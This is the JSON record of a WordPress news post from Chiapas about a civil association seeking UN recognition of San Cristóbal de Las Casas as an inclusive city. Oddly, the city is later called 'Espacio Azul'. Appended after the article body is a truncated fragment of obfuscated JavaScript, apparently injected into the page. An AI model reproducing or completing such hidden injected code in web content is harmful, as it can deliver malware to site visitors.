{"id":13939,"date":"2024-02-02T02:26:13","date_gmt":"2024-02-02T02:26:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13939"},"modified":"2024-02-02T02:26:14","modified_gmt":"2024-02-02T02:26:14","slug":"buscan-en-sclc-distincion-de-ciudad-incluyente-ante-la-onu","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13939","title":{"rendered":"Buscan en SCLC Distinci\u00f3n de Ciudad Incluyente ante la ONU"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240201-WA0016-777x1024.jpg\" alt=\"\" class=\"wp-image-13940\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240201-WA0016-777x1024.jpg 777w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240201-WA0016-228x300.jpg 228w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240201-WA0016-768x1012.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG-20240201-WA0016.jpg 971w\" sizes=\"auto, (max-width: 777px) 100vw, 777px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- El presidente de la Asociaci\u00f3n Civil S\u00ed Podemos, Homer Sevilla, destac\u00f3 la importancia de la inclusi\u00f3n social como una de las principales propuestas de la organizaci\u00f3n, por lo que se\u00f1al\u00f3 que a pesar de tres periodos de gobierno municipal, esta propuesta a\u00fan no se ha concretado.&#8221;En campa\u00f1as electorales es com\u00fan escuchar la palabra inclusi\u00f3n. Desafortunadamente, si la voluntad pol\u00edtica no es humanista, la inclusi\u00f3n social seguir\u00e1 siendo discriminada sistem\u00e1ticamente&#8221;, afirm\u00f3.Asimismo, resalt\u00f3 la necesidad de un compromiso genuino por parte de las autoridades y la sociedad en su conjunto. &#8220;Una de las metas ambiciosas que S\u00ed Podemos busca alcanzar es la distinci\u00f3n de ciudad incluyente ante la Organizaci\u00f3n de las Naciones Unidas (ONU)&#8221;. Por \u00faltimo, expres\u00f3 su esperanza de que este objetivo pueda lograrse con la colaboraci\u00f3n de los tres niveles de gobierno, la sociedad civil, empresarios y, por supuesto, las personas con discapacidad y vulnerabilidad.La b\u00fasqueda de esta distinci\u00f3n ante la ONU no solo representa un reconocimiento internacional, sino tambi\u00e9n un compromiso firme con la igualdad, la justicia social y el respeto a la diversidad en Espacio Azul.S\u00ed Podemos invita a todas las partes interesadas a unirse en este esfuerzo conjunto para hacer de Espacio Azul un modelo de inclusi\u00f3n y respeto para todos sus habitantes.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- El presidente de la Asociaci\u00f3n Civil S\u00ed Podemos, Homer Sevilla, destac\u00f3 la importancia de la inclusi\u00f3n social como una de las principales propuestas de la organizaci\u00f3n, por lo que se\u00f1al\u00f3 que a pesar de tres periodos de gobierno municipal, esta propuesta a\u00fan no se ha concretado.&#8221;En campa\u00f1as &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13940,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13939","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13939","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13939"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13939\/revisions"}],"predecessor-version":[{"id":13941,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13939\/revisions\/13941"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13940"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13939"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13939"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13939"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}